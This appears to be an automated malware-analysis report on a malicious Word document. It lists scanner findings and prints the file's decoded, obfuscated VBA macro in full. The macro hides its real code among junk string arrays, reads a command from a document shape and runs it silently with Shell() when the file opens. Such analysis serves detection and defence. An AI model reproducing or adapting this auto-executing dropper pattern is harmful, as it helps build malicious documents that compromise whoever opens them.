MALICIOUS
210
Risk Score
Heuristics 7
-
ClamAV: Doc.Malware.Generic-6750782-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6750782-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBAMatched line in script
"QK", "M", "sl", "mz", "Y", "Qn", "Wf", "zi") Shell BzQLYDwwKLu + RJkoJB + ELluzUiA, 0 smwzJp = Array("F", "DA", "L", "z", "t", "wp", "pc", "P", _ -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub AutoOpen() WlqsdN = Array("W", "XK", "zd", "lE", "Dz", "d", "k", "C", _ -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6226 bytes |
SHA-256: 055c8b530cacc757ff45d181268da33bc3793aa5c58dbe3a735225adf860457b |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "DjZBwfQPcGK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function VUDuHXZbYFQ()
tDzaDt = Array("M", "fb", "Gk", "H", "MT", "Gv", "uf", "d", _
"IX", "KM", "u", "Kh", "Zn", "kb", "HE", "Eh", _
"Z", "O", "w", "C", "sQ", "D", "j", "Q", _
"p", "w", "cu", "i", "L", "X", "v", "bz", _
"I", "ww", "H", "rI", "YS", "dr", "s", "kZ", _
"HF", "n", "C", "l", "R", "SG", "T", "t", _
"p", "k", "jG", "QW", "FC", "r", "c", "r", _
"I", "E", "F", "Lw", "o", "X", "zX", "NM")
idAvqR = Array("w", "Fz", "Iq", "No", "zU", "l", "F", "PI", _
"m", "fC", "l", "nF", "n", "V", "is", "w", _
"m", "nk", "OG", "wE", "Ha", "I", "k", "zm", _
"M", "Hn", "zz", "Hj", "ov", "r", "Gj", "Gs", _
"iL", "Mt", "Z", "SP", "z", "f", "zJ", "H", _
"p", "C", "f", "RM", "tJ", "df", "v", "cE", _
"MN", "d", "ww", "S", "W", "z", "rJ", "Z", _
"Gv", "P", "G", "Tt", "k", "j", "U", "bL")
OaKOiY = Array("J", "M", "jY", "P", "jP", "Ja", "Y", "d", _
"b", "w", "Rn", "r", "Pk", "hG", "v", "L", _
"lA", "q", "a", "mm", "qB", "lc", "qL", "v", _
"Xh", "A", "j", "Uv", "NN", "r", "U", "b", _
"W", "Z", "z", "l", "E", "X", "sQ", "O", _
"i", "Sq", "R", "Kc", "ju", "c", "j", "Z", _
"wf", "m", "X", "LY", "Vw", "c", "lh", "T", _
"i", "qX", "B", "h", "EA", "rN", "n", "D")
BzQLYDwwKLu = "" + qFuVWlj + CnVvwqzz + Shapes("zzwLjoXFbNGm").TextFrame.ContainingRange + vfCrhG + isQwk
EzAwmci = Array("zc", "Ej", "u", "ch", "u", "qf", "Ma", "zA", _
"qn", "ob", "BB", "bU", "vF", "d", "R", "w", _
"ON", "fO", "X", "Lt", "nB", "ob", "tR", "bw", _
"az", "ZE", "ER", "EX", "an", "N", "d", "a", _
"jK", "Uk", "d", "r", "wS", "Pi", "s", "D", _
"b", "jd", "N", "jf", "T", "V", "r", "BF", _
"h", "tw", "Y", "z", "a", "SK", "T", "m", _
"QK", "M", "sl", "mz", "Y", "Qn", "Wf", "zi")
Shell BzQLYDwwKLu + RJkoJB + ELluzUiA, 0
smwzJp = Array("F", "DA", "L", "z", "t", "wp", "pc", "P", _
"cu", "O", "s", "TI", "aj", "Al", "H", "Ls", _
"t", "a", "D", "h", "D", "t", "iN", "q", _
"p", "P", "vB", "Jm", "Ea", "mt", "R", "Wo", _
"KX", "v", "m", "BK", "Nd", "AE", "Vw", "j", _
"Q", "d", "VX", "LM", "AB", "f", "zv", "OJ", _
"c", "q", "pm", "tw", "AF", "uz", "zj", "h", _
"zI", "b", "U", "f", "I", "a", "n", "n")
LNZQPakoZ = Array("tO", "B", "B", "vz", "Io", "pA", "sV", "i", _
"C", "WZ", "AC", "F", "N", "wo", "z", "X", _
"lh", "X", "XV", "QW", "OT", "rq", "hb", "Ad", _
"ud", "Ls", "b", "bz", "tY", "Pj", "M", "l", _
"Xt", "hH", "wS", "ok", "G", "u", "Lc", "pd", _
"Q", "BT", "MB", "W", "sd", "j", "i", "Df", _
"lJ", "lR", "Ul", "ki", "UR", "Jj", "Ck", "Q", _
"A", "c", "Lt", "qf", "C", "H", "PB", "r")
RhYYsz = Array("r", "k", "h", "J", "J", "Jw", "V", "E", _
"bA", "X", "z", "j", "Y", "K", "Ko", "Lb", _
"Uj", "j", "M", "MH", "pr", "d", "ws", "kS", _
"j", "Kn", "sh", "Vz", "ui", "Jb", "D", "p", _
"wu", "hR", "uN", "Ya", "P", "vq", "kT", "j", _
"pw", "Zs", "V", "X", "c", "jr", "FS", "m", _
"Z", "Rl", "w", "k", "Ts", "BK", "j", "so", _
"s", "B", "f", "EE", "n", "I", "U", "O")
End Function
Sub AutoOpen()
WlqsdN = Array("W", "XK", "zd", "lE", "Dz", "d", "k", "C", _
"Lh", "v", "G", "rd", "h", "Ev", "so", "nZ", _
"AQ", "j", "n", "sf", "j", "kB", "db", "rA", _
"FZ", "K", "Ci", "RH", "c", "LQ", "M", "T", _
"wz", "z", "T", "rP", "l", "Zz", "qq", "J", _
"QI", "w", "z", "qX", "P", "YD", "HU", "w", _
"Jr", "E", "Y", "r", "Z", "m", "i", "qj", _
"i", "Z", "T", "zG", "V", "n", "S", "ib")
iLSpF = Array("UH", "M", "BH", "C", "D", "zm", "p", "ij", _
"uY", "fq", "Sr", "s", "i", "m", "EO", "F", _
"Ob", "lv", "Li", "pZ", "FO", "vW", "Wj", "Qh", _
"J", "c", "t", "b", "c", "c", "Z", "kw", _
"oz", "Tb", "Dn", "ic", "YB", "to", "ZP", "l", _
"NG", "F", "fV", "A", "t", "QD", "hs", "X", _
"dz", "E", "dZ", "WL", "mD", "Q", "U", "R", _
"b", "b", "iG", "pz", "jr", "pD", "m", "F")
nZVCJBM = Array("OW", "uI", "H", "Qu", "kw", "i", "Cq", "nS", _
"TM", "WY", "mE", "YR", "B", "f", "iD", "z", _
"SS", "d", "r", "zS", "Z", "f", "l", "ls", _
"w", "z", "T", "Wi", "bM", "ST", "A", "Xs", _
"G", "Eb", "r", "Vw", "cs", "L", "W", "t", _
"h", "Iu", "G", "HE", "Dr", "tl", "C", "Y", _
"b", "A", "Dw", "Y", "P", "jA", "L", "z", _
"jV", "ka", "tC", "z", "I", "Q", "fd", "t")
VUDuHXZbYFQ
vHncvrtOM = Array("jw", "b", "w", "WQ", "PD", "BE", "X", "vt", _
"C", "jN", "Ar", "f", "wc", "i", "Qw", "uq", _
"R", "d", "Vl", "l", "P", "T", "j", "R", _
"i", "sB", "DT", "bW", "s", "wB", "U", "RG", _
"S", "T", "Lj", "Il", "Rz", "Cw", "wj", "J", _
"t", "F", "sT", "Q", "v", "K", "Mh", "S", _
"W", "Tq", "A", "tt", "F", "E", "w", "Y", _
"Nq", "N", "r", "CN", "oq", "X", "Gl", "w")
WLuQBCwp = Array("vm", "j", "pd", "I", "a", "kW", "m", "f", _
"UT", "G", "V", "q", "E", "wP", "t", "D", _
"k", "Tc", "O", "Mz", "oc", "zW", "V", "h", _
"UN", "z", "MM", "K", "r", "OP", "l", "rA", _
"Xs", "j", "Z", "wa", "C", "r", "C", "k", _
"B", "B", "Bi", "rO", "d", "cd", "i", "b", _
"bz", "m", "f", "PX", "r", "z", "H", "vz", _
"qn", "JL", "V", "jY", "JO", "iJ", "A", "o")
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.